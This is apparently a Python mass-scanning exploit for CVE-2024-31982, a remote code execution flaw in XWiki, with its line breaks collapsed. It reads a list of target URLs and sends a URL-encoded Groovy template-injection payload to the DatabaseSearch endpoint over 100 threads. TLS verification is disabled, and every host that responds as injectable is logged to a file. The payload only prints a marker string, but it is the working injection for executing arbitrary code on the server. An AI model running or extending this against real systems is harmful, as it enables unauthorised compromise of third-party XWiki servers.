# !/usr/bin/python3 # CVE-2024-31982 # Xwiki RCE from random import random import requests import threading import urllib3 urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) file_lock = threading.Lock() # WRITE_URL def write_to_file(data): with file_lock: with open("vul_url.txt", "a+") as file: file.write(data + "\n") def run(url): try: vul_url = url + """/bin/get/Main/DatabaseSearch?outputSyntax=plain&text=""" # Command # }}}{{async async=false}}{{groovy}}println("Successful Injection"){{/groovy}}{{/ vul_url += """%7D%7D%7D%7B%7Basync%20async%3Dfalse%7D%7D%7B%7Bgroovy%7D%7Dprintln%28%22Successful%20Injection%22%29%7B%7B%2Fgroovy%7D%7D%7B%7B%2F""" res = requests.get(url=vul_url, proxies={'http':'http://127.0.0.1:7890'}, verify=False, timeout=10) # print(res.text) if res.status_code == 200 and 'Injection' in res.text: print(f"{url} is vulnerbale") write_to_file(url) except Exception as e: print(e) return None max_threads = 100 semaphore = threading.Semaphore(max_threads) class MyThread(threading.Thread): def __init__(self, url): super().__init__() self.url = url def run(self): try: run(self.url) except requests.exceptions.RequestException as e: return None semaphore.release() def print_ascii_art(): # ASCII ART SLANT print(""" ______ _ __ ______ ___ ____ ___ __ __ _____ ___ ____ ____ ___ / ____/| | / / / ____/ |__ \ / __ \ |__ \ / // / |__ / < / / __ \ ( __ ) |__ \ / / | | / / / __/ ______ __/ / / / / / __/ / / // /_ ______ /_ < / / / /_/ / / __ | __/ / / /___ | |/ / / /___ /_____/ / __/ / /_/ / / __/ /__ __//_____/ ___/ / / / \__, / / /_/ / / __/ \____/ |___/ /_____/ /____/ \____/ /____/ /_/ /____/ /_/ /____/ \____/ /____/ @Leviathan """) def main(): print_ascii_art() print("Script is running!") # OPEN URL FILE with open("new_url.txt", "r") as file: urls = file.readlines() threads = [] for url in urls: semaphore.acquire() thread = MyThread(url.strip()) thread.start() threads.append(thread) for thread in threads: thread.join() if __name__ == "__main__": main()